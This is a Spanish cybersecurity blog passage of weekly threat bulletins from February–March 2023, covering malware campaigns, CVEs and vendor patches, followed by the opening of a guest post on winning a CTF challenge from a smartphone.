Metabase Q Team, el troyano se ha diseminado a través de emails de phishing cargados con facturas falsas en formato HTML o PDF con contraseña. Otra estrategia consiste en comprometer sitios web legítimos en busca de versiones vulnerables de WordPress para convertirlos en su servidor C2 y propagar malware desde allí. Según la investigación, la campaña comenzó en agosto de 2022 y permanece activa, afectando a usuarios bancarios de Chile, México y Perú, principalmente. En noviembre de 2019, ESET documentó por primera vez la existencia de Mispadu (también conocido como URSA), un malware capaz de realizar robos de dinero y credenciales, así como de actuar como puerta trasera, tomando capturas de pantalla y registrando pulsaciones de teclas. Más info → * * * Nuevas vulnerabilidades 0-day contra diferentes fabricantes durante el concurso Pwn2Own Durante esta semana está teniendo lugar el concurso de hacking Pwn2Own que se celebra en la ciudad canadiense de Vancouver hasta el viernes 24 de marzo. Tras el primer día, los participantes han conseguido mostrar como vulnerar múltiples productos, entre los que se encuentran el sistema operativo Windows 11 junto con Microsoft Sharepoint, Ubuntu, Virtual Box, Tesla - Gateway y Adobe Reader. Cabe destacar que, según la programación del evento, durante el día de hoy y mañana los investigadores de seguridad muestren nuevamente otras 0-day que afecten a estos activos, además de a otros como Microsoft Teams o VMWare Workstation. En último lugar, cabe reseñar que después de que estas nuevas vulnerabilidades 0-day se demuestren y divulguen durante el Pwn2Own, los proveedores disponen de 90 días lanzar parches de seguridad para estos fallos de seguridad antes de que Zero Day Initiative divulgue la información públicamente. Más info → * * * Corregida vulnerabilidad crítica en WooCommerce Payments El investigador Michael Mazzolini de GoldNetwork informó esta semana de una vulnerabilidad en WooCommerce Payments, lo que ha dado lugar a que se esté forzando la instalación de una actualización de seguridad. La vulnerabilidad aun no cuenta con un identificador CVE, si bien ha sido asignada una criticidad CVSSv3 de 9.8, al ser una vulnerabilidad de escalada de privilegios y omisión de autenticación, que podría permitir a un atacante no autenticado hacerse pasar por un administrador y tomar el control del sitio web de tiendas online. Cabe señalarse que, por el momento, no se ha detectado la explotación activa de esta, si bien desde Patchstack han advertido que, debido a que para su explotación no se requiere autenticación, es probable que se detecte su explotación próximamente. Las versiones afectadas son de la 4.8.0 a la 5.6.1, habiendo quedado corregida la vulnerabilidad en la versión 5.6.2. Más info →
24 de marzo de 2023
Boletín semanal de Ciberseguridad, 11 – 17 de marzo
Nueva versión del troyano bancario Xenomorph Investigadores de ThreatFabric han detectado una nueva variante del troyano bancario para Android Xenomorph. Esta familia de malware fue detectada por primera vez en febrero de 2022, siendo atribuida su creación a Hadoken Security Group. Xenomorph V3 o Xenomorph.C, que es como se ha clasificado esta nueva variante, estaría siendo distribuida mediante la plataforma Zombinder, en Google Play store, apareciendo como un supuesto conversor de moneda, que descarga una actualización una aplicación que se hace pasar por Google Protect. Una de las principales novedades de esta versión es la introducción de un marco ATS (Automated Transfer Systems) utilizado para extraer automáticamente credenciales, saldo de la cuenta, iniciar transacciones, obtener tokens MFA y finalizar transferencias de fondos. Asimismo, también ha agregado capacidades de Cookie stealer. Xenomorph V3 es capaz de atacar más de 400 instituciones bancarias y financieras, incluidas billeteras de criptomonedas, esto supone un aumento muy significativo del volumen de víctimas, ya que en su primera versión tan sólo apuntaba contra 56 bancos europeos. Cabe señalarse asimismo que son instituciones bancarias españolas contra las que está dirigido principalmente, seguido de Turquía, Polonia y Estados Unidos. Por último, los investigadores señalan que se trata de uno de los troyanos más avanzados y peligrosos en circulación, y que podría serlo más ya que probablemente empiece a distribuirse como MaaS. Más info ⇾ * * * Patch Tuesday de Microsoft incluye dos 0-day activamente explotados En su última actualización de seguridad, Microsoft ha corregido un total de 83 vulnerabilidades que afectan a varios de sus productos entre los que se encuentran afectados Microsoft Windows, Office, Exchange o Azure. En concreto, nueve de estas vulnerabilidades habrían recibido una puntuación de severidad crítica, y otras 69 se habrían puntuado como "importantes". Entre todas ellas, destaca que dos de estos errores de seguridad serían 0-day activamente explotados, CVE-2023-23397, una vulnerabilidad de escalado de privilegios en Outlook con una puntuación CVSSv3 de 9.8 y CVE-2023-24880, una vulnerabilidad de bypass de características de seguridad en Windows SmartScreen con una puntuación CVSSv3 de 5.4. Atendiendo a la vulnerabilidad CVE-2023-23397, Microsoft también ha publicado un script de esta. Cabe señalarse al respecto, que de acuerdo con las investigaciones, esta habría sido explotada como 0-day desde al menos abril de 2022, teniéndose constancia de quince organizaciones atacadas mediante esta. La vulnerabilidad fue descubierta por el Equipo de Respuesta a Emergencias Informáticas de Ucrania (CERT-UA), quien informó de Microsoft. Esta vulnerabilidad podría ser aprovechada por un atacante para enviar un correo electrónico especialmente diseñado contra un cliente de Outlook, el cual se activa automáticamente cuando Outlook lo recupera y procesa, produciéndose la explotación antes de que el email se vea en el panel de vista previa, y de esta forma robar credenciales NTLM. Más info ⇾ * * * YoroTrooper: nuevo actor amenaza enfocado al ciberespionaje Investigadores de Cisco Talos han detectado un nuevo actor amenaza focalizado en la ejecución de campañas de ciberespionaje. YoroTrooper, que es como lo han denominado los investigadores, llevaría activo desde al menos junio de 2022, si bien no habría sido hasta febrero de 2023 cuando ha ganado mayor popularidad. Hasta el momento se han detectado campañas de YoroTrooper dirigidas contra organizaciones gubernamentales y energéticas en países de la Comunidad de Estados Independientes (CIS), además de la Organización Mundial de la Propiedad Intelectual (WIPO) y una agencia de atención médica de la Unión Europea. El vector de entrada de los ataques es mediante correos electrónicos de phishing con un archivo adjunto malicioso. YoroTrooper utiliza varios troyanos de acceso remoto como AveMaria/Warzone RAT, LodaRAT y un implante personalizado en Python. También emplea stealers como Stink Stealer, y los frameworks Nuitka o PyInstaller. Asimismo, se utiliza Telegram como C2 para las comunicaciones entre los operadores y los malware instalados. Más info ⇾ * * * CISA advierte de la explotación de un 0-day en Adobe y urge a la aplicación del parche La Agencia de Seguridad de la Ciberseguridad y la Infraestructura de EE UU (CISA) ha alertado de la explotación como 0-day de la vulnerabilidad CVE-2023-26360 en Adobe ColdFusion y ha dado un plazo de tres semanas a todas las agencias gubernamentales para que apliquen el parche publicado el miércoles por Adobe. Aunque en el Patch Tuesday de Adobe afirmó que la vulnerabilidad había sido explotada de forma muy limitada, la CISA subió el nivel de alerta al calificar de urgente y obligatoria la necesidad de aplicar los parches, confirmando así las palabras de Charlie Arehart, descubridor de la vulnerabilidad y que criticó a Adobe por la escasa importancia otorgada a la vulnerabilidad, que permite la ejecución de código arbitrario. Más info ⇾ * * * Vulnerabilidades 0-day en los chipsets Exynos de Samsung Project Zero, el equipo de seguridad de Google, reveló en una publicación la existencia de 18 vulnerabilidades 0-day en los chipsets Exynos de Samsung, utilizados en dispositivos móviles, portátiles y coches. Cuatro de estos fallos son los más graves; sería el caso de la vulnerabilidad identificada como CVE-2023-24033 y otros tres a los que no se les ha asignado aún CVE, cuya explotación permitiría la ejecución remota de código desde Internet a la banda base y para la cual el atacante no necesitaría la interacción de la víctima, solamente su número de teléfono. Por otro lado, el resto de las vulnerabilidades, algunas de ellas identificadas CVE-2023-26072, CVE-2023-26073, CVE-2023-26074, CVE-2023-26075, CVE-2023-26076, no se han puntuado como graves al requerir un operador de red móvil malicioso o que el atacante tenga acceso local al dispositivo. En cuanto a los dispositivos afectados, Samsung ha publicado una actualización de seguridad en la que los indica. Respecto a los parches, los dispositivos Pixel han recibido una corrección para una de las vulnerabilidades, mientras que, al resto de usuarios afectados se les recomienda desactivar las llamadas Wi-Fi y Voice-over-LTE. Más info ⇾
17 de marzo de 2023
Boletín semanal de Ciberseguridad, 4 – 10 de marzo
El FBI y la CISA lanzan un aviso para combatir Royal Ransomware El pasado 2 de marzo, el FBI y la CISA lanzaron el Aviso de Seguridad Cibernética #StopRansomware: Royal Ransomware para ayudar a combatir este tipo de ransomware, difundiendo TTPs e IOCs. Desde septiembre de 2022, muchas empresas de distintos sectores de infraestructura crítica como industria, telecomunicaciones, salud, educación, entre otros, han sido vulneradas con esta variante de ransomware. El FBI y la CISA creen que Royal utiliza su propio programa de cifrado de archivos, además, desactivan el antivirus al conseguir acceder a un sistema y filtran los datos antes de implementar finalmente el ransomware. Posteriormente, solicitan rescates de entre uno y once millones de dólares en Bitcoin y en la nota que dejan a las víctimas indicado un sitio .onion para establecer contacto. Se recomienda a las organizaciones implantar las recomendaciones y mitigaciones del aviso para evitar estos ataques. Más info → * * * Hiatus: campaña mundial contra routers empresariales El equipo de Lumen Black Lotus Labs ha identificado una campaña activa dirigida contra routers a nivel empresarial. La campaña, que ha sido denominada como “Hiatus”, llevaría activa desde julio de 2022 siendo sus objetivos routers DrayTek Vigor en los modelos 2960 y 3900 con una arquitectura i386, y que se encuentran al final de su vida útil. Por el momento se desconoce el vector de entrada, si bien, una vez vulnerado el router los actores amenaza implementan un bash script que descarga y ejecuta dos binarios maliciosos: por un lado, HiatusRAT, y por otro una variante de tcpdump para la captura de paquetes. De acuerdo con los investigadores, se habrían detectado al menos 100 víctimas, que habrían pasado a formar parte de la red de bots de los actores maliciosos, estando en su mayoría situadas en Europa, América del Norte y América del Sur. Desde Lumen Black Lotus Labs estiman que los actores amenaza habrían mantenido la campaña en niveles bajos de infección con el fin de evadir la detección al no llamar tanto la atención. Más info → * * * SYS01stealer: nuevo infostealer dirigido contra infraestructuras críticas El equipo de investigadores de Morphisec ha publicado un informe sobre un nuevo infostealer dirigido contra infraestructuras gubernamentales críticas al que han denominado SYS01stealer. En concreto, actores maliciosos tras esta amenaza tratan de dirigir sus acciones contra cuentas corporativas de Facebook mediante el uso de anuncios de Google y perfiles de Facebook falsos que facilitan enlaces de descarga promocionando juegos, contenido para adultos, software, pero que en realidad son maliciosos. Cabe destacar que una vez que la víctima descarga el fichero .zip, y se ejecuta, el archivo procederá a realizar una carga lateral DLL dentro del sistema de la víctima. Los expertos señalan que el objetivo de SYS01stealer consiste en robar cookies del navegador y aprovechar sesiones autenticadas de Facebook para exfiltrar información de la cuenta de Facebook de la víctima. Asimismo, el malware también puede cargar archivos desde el sistema infectado al servidor Command & Control y ejecutar comandos enviados por este. Más info → * * * PoC de malware polimórfico empleando Inteligencia Artificial Investigadores de Hyas han construido una prueba de concepto para la generación de malware polimórfico a través de un modelo de lenguaje de Inteligencia Artificial. El software creado, al que han denominado BlackMamba, es un keylogger polimórfico con la capacidad de modificar su código durante la ejecución, y sin necesidad del uso de infraestructuras de Command & Control (C2). BlackMamba emplea un ejecutable benigno para comunicarse con la API de OpenAI durante su ejecución, que le proporciona el código malicioso necesario para recopilar las pulsaciones del teclado del usuario. Cada vez que el malware se ejecuta, esta capacidad se sintetiza de nuevo, permitiéndole evadir soluciones de seguridad. Según los investigadores, en su análisis con una conocida solución de EDR, no se obtuvo ninguna detección del programa malicioso. La exfiltración de los datos recolectados por el malware en esta prueba se realiza a través de Microsoft Teams, al que accede con las credenciales robadas. Más info →
10 de marzo de 2023
Boletín semanal de Ciberseguridad, 25 de febrero – 3 de marzo
Vulnerabilidades en Houzez de WordPress Un investigador de seguridad de Patchstack ha descubierto recientemente dos vulnerabilidades críticas en Houzez, un tema y su plugin de WordPress que permite administrar listas de forma sencilla y fluida para el cliente. La primera vulnerabilidad, identificada como CVE-2023-26540 y CVSS de 9.8, hace referencia a un error de configuración que afecta a la versión 2.7.1 y anteriores, y puede ser explotada de forma remota sin necesidad de autenticación para escalar privilegios. Por otro lado, el fallo identificado como CVE-2023-26009 y CVSS 9.8, afecta al inicio de sesión de Houzez en las versiones 2.6.3 y anteriores. En los ataques observados por Patchstack, los actores amenaza distribuyeron un backdoor capaz de ejecutar comandos, inyectar anuncios en el sitio web y redirigir hacia sitios maliciosos, por lo que los investigadores recomiendan actualizar a la mayor brevedad posible. Más info → * * * Digital Smoke: estafa de fraude de inversiones a nivel mundial El equipo de Resecurity ha identificado una red de fraude de inversiones, que habría operado desde el año 2015 hasta inicios del año 2023. Los actores maliciosos detrás de esta red, a los que se ha denominado “Digital Smoke”, operaban suplantando a corporaciones conocidas mundialmente, como Verizon, BackRock, Ferrari, Shell o Barclays, entre otras, con el fin de que las víctimas, localizadas a nivel mundial, realizaran inversiones en productos de inversión falsos. Digital Smoke desarrolló una gran red de recursos web y aplicaciones móviles alojadas en diferentes proveedores de alojamiento y jurisdicciones. El modus operandi consistía en el registro de dominios similares a los legítimos de las empresas suplantadas, colocando los enlaces para el registro de nuevas víctimas en aplicaciones de mensajería como WhatsApp y otras redes sociales. Una vez que las víctimas se registraban en la página web o aplicación creada por los actores maliciosos, estos les solicitaban la realización de un pago para la presunta inversión. Cabe señalarse que los investigadores compartieron toda la información disponible con el Centro de Coordinación de Delitos Cibernéticos de la India y autoridades de EE UU a finales de 2022, siendo interrumpida la operación a principios de 2023. Más info → * * * Aruba corrige seis vulnerabilidades críticas Aruba ha publicado un aviso de seguridad en el que informa acerca de seis vulnerabilidades críticas que afectan a varias versiones de ArubaOS. Los productos afectados son Aruba Mobility Conductor, Aruba Mobility Controllers y WLAN Gateways y SD-WAN Gateways. Las vulnerabilidades identificadas como CVE-2023-22747, CVE-2023-22748, CVE-2023-22749 y CVE-2023-22750, todas con CVSSv3 9.8 derivan en un fallo de inyección de comandos. Las vulnerabilidades CVE-2023-22751 y CVE-2023-22752 también ambas con CVSSv3 9.8, son errores de buffer overflow. Estas vulnerabilidades pueden ser aprovechadas por un atacante no autenticado para enviar paquetes al PAPI (protocolo de administración de puntos de acceso de Aruba) a través del puerto UDP 8211, permitiendo la ejecución de código arbitrario como usuarios con privilegios en ArubaOS. Más info → * * * APT-C-36: nueva campaña maliciosa contra Ecuador y Colombia El equipo de investigadores de BlackBerry ha publicado una investigación en la que desvela la existencia de una nueva campaña de APT-C-36, grupo también conocido como BlindEagle, contra objetivos geolocalizados en Ecuador y Colombia. En concreto, en esta campaña actores maliciosos suplantaron la identidad de la Dirección de Impuestos y Aduanas Nacionales de Colombia y el Servicio de Rentas Internas de Ecuador con el objetivo de lanzar campañas de phishing dirigidas contra industrias clave en ambos países, entre las que se incluyen sector salud, financiero y gubernamental. Esta información surge a raíz de otro descubrimiento realizado el pasado mes de enero por parte de la compañía Check Point que alertaba de una campaña realizada por dicho actor y de la cual señalaban estar interesados en conseguir ganancias monetarias. No obstante, desde BlackBerry han indicado que durante los incidentes más recientes los objetivos eran el robo de información y espionaje de sus víctimas. Más info → * * * Campaña de cryptojacking contra bases de datos Redis Investigadores de Cado Labs han descubierto una campaña de cryptojacking que tiene como objetivo los servidores de bases de datos Redis mal configurados. La campaña se realiza a través de transfer.sh, un servicio de transferencia de archivos de código abierto que se lleva vulnerando desde 2014. El vector de acceso tiene lugar mediante la explotación de una implementación insegura de Redis, guardando la base de datos en un directorio cron que conduce a la ejecución de comandos arbitrarios. Dado que el objetivo principal del malware es minar criptomonedas con XMRig, lleva a cabo una serie de medidas para garantizar su efectividad. Entre estas, libera memoria en el sistema, elimina los cryptominers que pueda haber e instala un escáner de red para encontrar otros servidores Redis vulnerables y propagar la infección. Más info →
3 de marzo de 2023
Boletín semanal de Ciberseguridad, 18 – 24 de febrero
Fortinet corrige vulnerabilidades críticas en FortiNAC y FortiWeb Fortinet ha emitido un aviso de seguridad en el que corrige dos vulnerabilidades críticas que afectan a sus productos FortiNAC y FortiWeb. En concreto, dichos fallos de seguridad han sido registrados como CVE-2022-39952, con un CVSSv3 de 9.8, el cual afecta a FortiNAC y podría permitir a un atacante no autenticado ejecutar código o comandos no autorizados a través de una solicitud HTTP especialmente diseñada. Asimismo, la otra vulnerabilidad identificada como CVE-2021-42756, cuenta con un CVSSv3 de 9.3, afecta a FortiWeb y su explotación podría permitir a un atacante remoto no autenticado realizar ejecución de código arbitrario a través de solicitudes HTTP diseñadas para tales fines. Cabe destacar que Fortinet recomienda a los usuarios afectados actualizar, por una parte, FortiNAC a las versiones 9.4.1, 9.2.6, 9.1.8, y 7.2.0. y, por otra parte, en lo que respecta a FortiWeb, actualizar a 7.0.0, 6.3.17, 6.2.7, 6.1.3 y 6.0.8 o posterior. Más info → * * * Expuestas credenciales de acceso de dos grandes operadores de centros de datos El equipo de Resecurity ha publicado una investigación acerca de la venta de credenciales de acceso de dos operadores de centros de datos en Asia, en concreto GDS Holdings Ltd. (China) y ST Telemedia Global Data Centres (Singapur). Los incidentes de seguridad, de los que no se ha esclarecido aún cómo ocurrieron, tuvieron lugar en el año 2021, sin embargo, no se han conocido públicamente hasta ahora, cuando el 20 de febrero fueron publicados los datos robados en un foro underground. Entre los datos exfiltrados se encontrarían credenciales, correos electrónicos, números de teléfono o referencias de tarjetas de identificación, estimándose un compromiso de más de 3.000 registros en total. De manera indirecta, además, se han visto comprometidas grandes corporaciones mundiales que utilizaban dichos centros de datos, viéndose expuestos inicios de sesión de empresas como Apple, BMW, Amazon, Walmart, Alibaba, Microsoft, o Ford Motor, entre otros. Cabe señalarse que ambos centros de datos obligaron a sus clientes el pasado mes de enero a cambiar las contraseñas, si bien desde Resecurity han confirmado varios intentos de acceso a portales de clientes diferentes. Finalmente, cabe señalarse que los investigadores tampoco han podido atribuir estos ataques a ningún grupo en concreto. Más info → * * * Aplicaciones falsas de ChatGPT empleadas para distribuir malware Investigadores de Kaspersky alertan de la existencia de una falsa versión de escritorio para Windows de ChatGPT empleada para la distribución de malware. Aprovechando la creciente popularidad del chatbot de OpenAI, los autores de esta campaña estarían empleando cuentas en redes sociales publicitando la plataforma e incluyendo un enlace al supuesto sitio de descarga. Algunos de los perfiles identificados por Kaspersky también ofrecían cuentas de prueba para aumentar el interés de sus posibles víctimas. Una vez realizada la descarga se muestra un mensaje de error advirtiendo de un problema en la instalación, mientras que, en realidad, se habría descargado un troyano con capacidades de infostealer al que han denominado "Fobo". El equipo de inteligencia de Cyble también ha investigado esta misma campaña distribuyendo otras familias de malware como los stealers Lumma y Aurora. El investigador de seguridad Dominic Alvieri también ha publicado acerca de otros casos de campañas distribuyendo el stealer RedLine. Más info → * * * Vulnerabilidades en productos VMware VMware ha emitido dos avisos de seguridad en los que alerta sobre dos vulnerabilidades críticas que afectan a varios productos de la compañía: El fallo de seguridad más crítico ha sido registrado como CVE-2023-20858, con un CVSSv3 de 9.1 según fabricante, que afecta a Carbon Black App Control. El aprovechamiento de esta vulnerabilidad podría permitir a un actor malicioso usar una entrada especialmente diseñada en la consola de administración de App Control que permita el acceso al sistema operativo del servidor. Ha sido publicada otra vulnerabilidad registrada como CVE-2023-20855, con un CVSSv3 de 8.8 según fabricante, que impacta en los productos vRealize Orchestrator, vRealize Automation y Cloud Foundation. En este caso, un actor malicioso podría utilizar entradas especialmente diseñadas para eludir las restricciones de análisis de XML que termine con el acceso a información confidencial o permita realizar una escalada de privilegios en los sistemas afectados. Más info → * * * Campaña de phishing mediante PayPal Investigadores de Avanan han informado acerca de una nueva campaña de phishing enviada desde la plataforma PayPal. Los actores maliciosos están aprovechando la facilidad de crear cuentas gratuitas en PayPal, desde donde se ofrece la posibilidad de crear y enviar facturas a múltiples destinatarios a la vez. De esta forma, los mensajes recibidos por las víctimas provienen directamente del dominio de PayPal, eludiendo las posibles detecciones de seguridad. En la campaña detectada, se han observado varios mensajes donde se indica a las víctimas que se ha realizado un cargo a su cuenta, y que en caso de que no haya sido autorizado, deben llamar a un número de teléfono. Este número de teléfono no está asociado a PayPal, y al llamar los atacantes consiguen el número de teléfono de las víctimas y otros detalles personales, pudiendo utilizarlo en futuros ataques. Debido a la dificultad de implementar medidas de seguridad para bloquear estos correos electrónicos, los investigadores recomiendan buscar el número de teléfono en Internet con el fin de ver si tiene relación o no con PayPal. Más info →
24 de febrero de 2023
Boletín semanal de Ciberseguridad, 11 – 17 de febrero
Apple corrige 0-day activamente explotado Apple ha publicado varios avisos de seguridad para corregir una vulnerabilidad 0-day activamente explotada. El fallo de seguridad, catalogado como CVE-2023-23529, es de type confusion en el WebKit del navegador web que podría ser utilizado por un posible atacante para ejecutar código arbitrario en dispositivos vulnerables después de abrir una página web maliciosa creada para tales fines. Este fallo afecta tanto a dispositivos antiguos como más nuevos, quedando corregida en iOS 16.3.1 y iPadOS 16.3.1, macOS Ventura 13.2.1, y Safari 16.3.1. Por otro lado, Apple también ha corregido una vulnerabilidad en el kernel que permite ejecución de código remoto, registrada como CVE-2023-23514, que afectaba a dispositivos macOS Ventura y varios modelos de iPhone e iPad. En último lugar, una vulnerabilidad que podría permitir acceder a datos de usuario no protegidos que afectaba a macOS Ventura y que ha sido identificada como CVE-2023-23522. Más info → * * * Microsoft corrige 75 vulnerabilidades en su Patch Tuesday incluyendo 3 0-day En su última actualización de seguridad, Microsoft ha corregido 75 vulnerabilidades en diversos productos incluyendo Microsoft Windows, Office, Exchange o Azure. Nueve de estas vulnerabilidades habrían recibido una puntuación de severidad crítica, y otras 66 se habrían puntuado como "importantes". Tres de estos errores de seguridad serían 0-day activamente explotados: CVE-2023-21823, una vulnerabilidad de ejecución remota de código en Windows Graphics Component con una puntuación CVSSv3 de 7.8; CVE-2023-21715, una vulnerabilidad de bypass de características de seguridad en Microsoft Publisher con una puntuación CVSSv3 de 7.3 y CVE-2023-23376, una vulnerabilidad de escalada de privilegios en Windows Common Log File System Driver con una puntuación CVSSv3 de 7.8. Más info → * * * Ciberataque contra varias webs de la OTAN Un funcionario de la OTAN confirmó a la agencia de noticias DPA que la organización se encontraba investigando un ciberataque llevado a cabo contra varias webs de la Alianza Atlántica. El ataque tuvo lugar en la noche del domingo y dejó inoperativas varias webs de la OTAN como la del Cuartel General de Operaciones Especiales. El ataque se trataría de una acción hacktivista con motivaciones políticas a favor de una de las partes en el conflicto actual, ya que un canal de Telegram de un grupo hacktivista publicó un mensaje en el que solicitaba ayuda a sus compañeros para atacar a todas las unidades de la OTAN. Además, en otros canales de índole hacktivista publicaron pruebas de activos de la OTAN inoperativos como la web del Mando Militar o la del Centro Militar Conjunto, entre otras. Más info → * * * Mozilla emite actualizaciones de seguridad para Firefox 110 y Firefox ESR Mozilla ha publicado dos alertas de seguridad referentes a la corrección de vulnerabilidades en Firefox110 y FirefoxESR. La mayoría de estas vulnerabilidades, aún pendientes de clasificación CVSS, han sido categorizadas por el fabricante como de alto impacto. Su explotación podría llevar a un atacante a realizar ataques de tipo spoofing; acceder a información confidencial, incluyendo credenciales NTLM; evadir mecanismos de seguridad o ejecutar código arbitrario, entre otros comportamientos. El fabricante recomienda actualizar a la última versión de Firefox 110 y a Firefox ESR 102.8. La Agencia de Ciberseguridad e Infraestructura de Seguridad de Estados Unidos (CISA) ha emitido una notificación informando de estas actualizaciones y solicitando a los usuarios y administradores que apliquen las medidas necesarias. Más info → * * * Vulnerabilidades en modelos de PLC de Schneider Electric El equipo de investigadores de Vedere Labs de Forescout ha publicado un análisis sobre dos vulnerabilidades críticas que afectan a varios modelos de PLC de Schneider Electric. En concreto, dichos fallos de seguridad son el registrado como CVE-2022-45789, con un CVSSv3 9.8, y que permite una omisión de autenticación que podría causar la ejecución de funciones Modbus no autorizadas en el controlador, al secuestrar una sesión Modbus autenticada. Asimismo, la vulnerabilidad registrada como CVE-2022-45788, que también se le ha asignado un CVSSv3 de 9.8, podría ser aprovechada para la realización de ejecución remota de código, provocar un ataque denegación de servicio y podría ocasionar la pérdida de confidencialidad e integridad de los datos cuando se ejecutan comandos Modbus UMAS CSA no documentados. Los investigadores indican que actores maliciosos podrían encadenar la explotación de las mismas para lograr realizar movimiento lateral en la red de la víctima. Entre las versiones afectadas se encuentran todas las versiones de EcoStruxure Control Expert y de PLC Modicon Unity, de igual manera de EcoStruxure Process Expert la versión V2020. Más info → Foto principal: Ed Hardie / Unsplash.
17 de febrero de 2023
Boletín semanal de Ciberseguridad, 4 – 10 de febrero
Vulnerabilidad crítica en Atlassian Jira Atlassian ha emitido un aviso de seguridad en donde lanza correcciones para resolver una vulnerabilidad crítica en Jira Service Management Server and Data Center. En concreto, este fallo de seguridad ha sido registrado como CVE-2023-22501, CVSSv3 de 9.4 según fabricante, y ha sido clasificado de baja complejidad de ataque debido a que un actor malicioso podría obtener acceso a tokens de registro enviados a usuarios con cuentas en las que nunca se ha iniciado sesión. Esto podría desencadenar en una suplantación de usuario que permitiese obtener un acceso no autorizado a instancias críticas de Jira Service Management. Atlassian indica que el problema de seguridad afecta a las versiones 5.3.0 a 5.5.0, y aconseja actualizar a las versiones 5.3.3 , 5.4.2 , 5.5.1 y 5.6.0 o posteriores. En caso de no poder aplicar los parches a la mayor brevedad posible, el fabricante ha proporcionado una solución alternativa para actualizar manualmente el activo. Más info → * * * Campaña de Mustang Panda para distribuir PlugX Investigadores de EclecticIQ han detectado la existencia de una campaña de distribución del malware PlugX y atribuye la autoría de la misma a la APT Mustang Panda. Según la información publicada, Mustang Panda envió emails con temática relacionada con la Unión Europea en la que se encontraba un supuesto archivo Word que en verdad era un ejecutable tipo LNK que descarga en el sistema de la víctima PlugX. EclecticIQ afirma que el objetivo de la campaña son instituciones gubernamentales europeas y recuerda que ya se le atribuyó a este mismo actor una campaña similar el pasado mes de octubre, aunque en la campaña recién detectada Mustang Panda ha implementado mayores técnicas de evasión para evitar ser detectado. Más info → * * * Redes Tor e I2P víctimas de ataques de DDoS Recientemente las redes Tor y peer-to-peer (I2P) se han visto afectadas por ataques de denegación de servicio distribuidos (DDoS) que han ocasionado problemas de conectividad y rendimiento. Por una parte, Isabela Días Fernandes, directora ejecutiva de Tor Project, emitía un comunicado en el que se informaba que la red estaba recibiendo ataques de DDoS desde el pasado mes de julio. Si bien no se ha detallado el objetivo de estos ataques en curso o la identidad del actor amenaza tras estos hechos. Desde la compañía han comunicado que continúan trabajando para mejorar sus defensas y que los usuarios no se vean afectados. Por otra parte, la red I2P también está siendo víctima de un ataque de esta tipología durante los últimos tres días, provocando problemas de rendimiento y conectividad en la misma. Según las declaraciones del administrador del proyecto, al igual que en el caso de Tor, los actores amenazas tras estos ataques estarían utilizando una variedad de tácticas a la hora de perpetrar estos ataques de DDoS. Más info → * * * Nueva actualización de Google Chrome Google ha lanzado una nueva versión de Chrome 110 en la que se corrigen hasta un total de 15 vulnerabilidades, habiendo sido identificadas diez de ellas por investigadores de seguridad externos a la compañía. En concreto, el desglose de dichas vulnerabilidades por su criticidad es: 3 con criticidad alta, 5 medias y 2 bajas. De entre estas, las tres de mayor severidad son las identificadas como: en primer lugar CVE-2023-0696, la cual podría permitir a un atacante remoto explotarla a través de una página HTML especialmente diseñada. En segundo lugar, la registrada como CVE-2023-0697 y que afecta a Chrome para Android, la cual podría permitir que un atacante remoto use una página HTML manipulada para suplantar el contenido de la interfaz de usuario de seguridad. En último lugar, CVE-2023-0698 que permitiría a un atacante remoto realizar una lectura de memoria fuera de los límites a través de una página HTML maliciosa. Se recomienda actualizar a las versiones de Chrome 110.0.5481.77/.78 para Windows y 110.0.5481.77 para Mac y Linux para corregir estas vulnerabilidades. Más info →
10 de febrero de 2023
Así gané un desafío Capture the Flag resolviendo los retos desde mi móvil
Como parte de nuestra participación en el evento Barcelona Security Congress 2023, organizamos en el área Hacking Village actividades dirigidas a la audiencia técnica. Una de las actividades consistió en un desafío Capture the Flag para el que se registraron 74 hackers, entre participantes presenciales y online. David Soto, nuestro autor invitado en el blog, fue el primer participante en resolver tres retos, con lo que ganó el desafío y se llevó a casa el premio. En este post nos cuenta cómo lo consiguió usando solo el móvil, y cuáles son las claves para ir por delante en el ámbito de la Ciberseguridad. * * * POR DAVID SOTO ESPECIALISTA EN CIBERSEGURIDAD Soy David Soto y tengo la suerte de trabajar de consultor IT en ERNI Consulting España, como especialista en Ciberseguridad y desarrollo seguro. Un campo que me apasiona desde que era niño. En las competiciones de tipo Capture the Flag (CTF) me conocen con el alias de JDarkness y tengo el honor de haber ganado competiciones como IntelCon, MundoHacker o PwnVerse, entre otras. Y más recientemente, hace apenas unos días, el organizado por Telefónica Tech junto a campus 42 durante la celebración de Barcelona Cybersecurity Congress. Capture The Flag son juegos de competición gratuitos que ponen a prueba tus conocimientos y habilidades como hacker. En estas competiciones CTF los participantes se encuentran con diferentes modalidades de retos con el objetivo es conseguir una “bandera” (flag), un código que demuestra que han resuelto el reto. En esta ocasión, al ganar el desafío de una manera un tanto "diferente", usando solo mi teléfono móvil, me han invitado a escribir este post contando cómo fue la competición y mi experiencia. Así que aquí va mi historia: Hace un par de semanas, al mirar la agenda del Barcelona Cybersecurity Congress, me di cuenta de que este año habían preparado un desafío Capture the Flag híbrido, con modalidad online y presencial. Como tenía previsto ir al congreso, me apunté con intención de ver qué retos se planteaban, sentarme un rato con mi portátil y ver hasta dónde podía llegar. Humbert en el espacio Hacking Village de Barcelona Cybersecurity Congress Una vez recibí las entradas empecé a preparar la agenda: Tour con la DCA, visitas a los expositores de interés… Reservé 30 minutos para sentarme en la Hacking Village y ver los retos sin mucha intención de ganar. Al acabar el DCA Tour, me dirigí a la Hacking Village para conectarme con el portátil y afrontar los retos. Pero justo en ese momento había comenzado una ponencia y no quedaba ni un sitio libre. Como necesitaba conectar el portátil, pensé: "Bueno, de perdidos al río, como solo quiero ver de qué van los retos lo miro desde el móvil". Y me fui a visitar stands. Tengo que decir que en mi teléfono llevo un termux con una pequeña distribución Kali Linux. Algo que, aunque incómodo, me permite realizar pequeñas pruebas y tareas en caso de necesidad. CYBER SECURITY Introducción al análisis de malware: tipos que existen, síntomas y cómo identificarlos 6 de octubre de 2022 Cómo fue el desafío Capture the Flag, reto a reto En este CTF, coorganizado por Fundación Telefónica con el campus de programación 42, se retó a los participantes a tres desafíos de ciberseguridad más uno extra para poner a prueba sus habilidades en el análisis de memoria, uso de cookies, crack de contraseñas… Para ganar había que resolver al menos tres de los cuatro retos de calentamiento, esteganografía, forense y web. 1. Reto de calentamiento El reto de calentamiento consistía en encontrar una cadena de texto dentro de la página principal. Fácil, pasé al siguiente. 2. Reto de esteganografía Es un tipo de reto que se basa en ocultar información dentro de archivos o imágenes que no lo aparentan. Los participantes deben descubrir dónde está oculta la información, y extraerla. Tras el de calentamiento, el de esteganografía era el primero reto “de verdad”. Consistía en una pantalla de ‘login’ 